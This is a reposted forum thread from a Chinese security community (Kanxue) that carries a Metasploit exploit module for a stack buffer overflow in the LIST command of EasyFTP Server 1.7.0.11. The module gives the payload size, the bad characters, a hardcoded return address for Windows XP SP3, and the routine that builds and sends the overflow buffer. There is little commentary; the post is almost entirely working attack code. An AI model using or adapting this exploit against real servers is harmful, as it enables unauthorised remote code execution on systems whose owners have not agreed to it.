[转帖]Easy FTP Server v1.7.0.11 LIST远程执行漏洞-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[转帖]Easy FTP Server v1.7.0.11 LIST远程执行漏洞

发表于: 2010-7-24 05:56 3943

[转帖]Easy FTP Server v1.7.0.11 LIST远程执行漏洞

freebsdlin 活跃值

2010-7-24 05:56

3943

##

# EDB-ID: 14400

# Date : July 5, 2010

# Discovered by : Karn Ganeshen

# Version : 1.7.0.11

# Tested on : Windows XP SP3 Version 2002

# MFR  & VAS TEAM : just testing howto convert exploits to metasploit modules.

##

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote  
 
    Rank = GreatRanking  
 
    include Msf::Exploit::Remote::Ftp  
 
    def initialize(info = {})  
 
        super(update_info(info,  
 
            'Name'           => 'EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow',  
 
            'Description'    => %q{  
 
                    This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.  
 
                    credit goes to Karn Ganeshan.     
 
            },  
 
            'Author'         =>  
 
                [  
 
                    'Karn Ganeshan <karnganeshan [at] gmail.com>', # original version  
 
                    'MFR' # convert to metasploit format.  
 
                ],  
 
            'License'        => MSF_LICENSE,  
 
            'Version'        => 'Version: 1',  
 
            'References'     =>  
 
                [  
 
                    [ 'EDB', '14400' ],  
 
                ],  
 
            'DefaultOptions' =>  
 
                {  
 
                    'EXITFUNC' => 'thread'
 
                },  
 
            'Privileged'     => false,  
 
            'Payload'        =>  
 
                {  
 
                    'Space'    => 268,  
 
                    'BadChars' => "\x00\x0a\x0d\x2f\x5c",   
 
                    'DisableNops' => false
 
                },  
 
            'Platform'   => 'win',  
 
            'Targets'        =>  
 
                [  
 
                    [ 'Windows XP SP3 - Version 2002',   { 'Ret' => 0x7e49732b } ],  
 
                ],  
 
            'DisclosureDate' => 'July 5 2010',  
 
            'DefaultTarget' => 0))  
 
    end 
 
    def check  
 
        connect  
 
        disconnect  
 
        if (banner =~ /BigFoolCat/)  
 
            return Exploit::CheckCode::Vulnerable  
 
        end 
 
            return Exploit::CheckCode::Safe  
 
    end 
 
    def exploit  
 
        connect_login  
 
        buf = ''
 
        buf << make_nops(268 - payload.encoded.length - 4)  
 
        print_status("Adding the payload...")  
 
        buf << payload.encoded  
 
        buf << [target.ret].pack('V')  
 
        print_status("Sending exploit buffer...")  
 
        send_cmd( ['LIST', buf] , false)   
 
        handler  
 
        disconnect  
 
    end 
 
end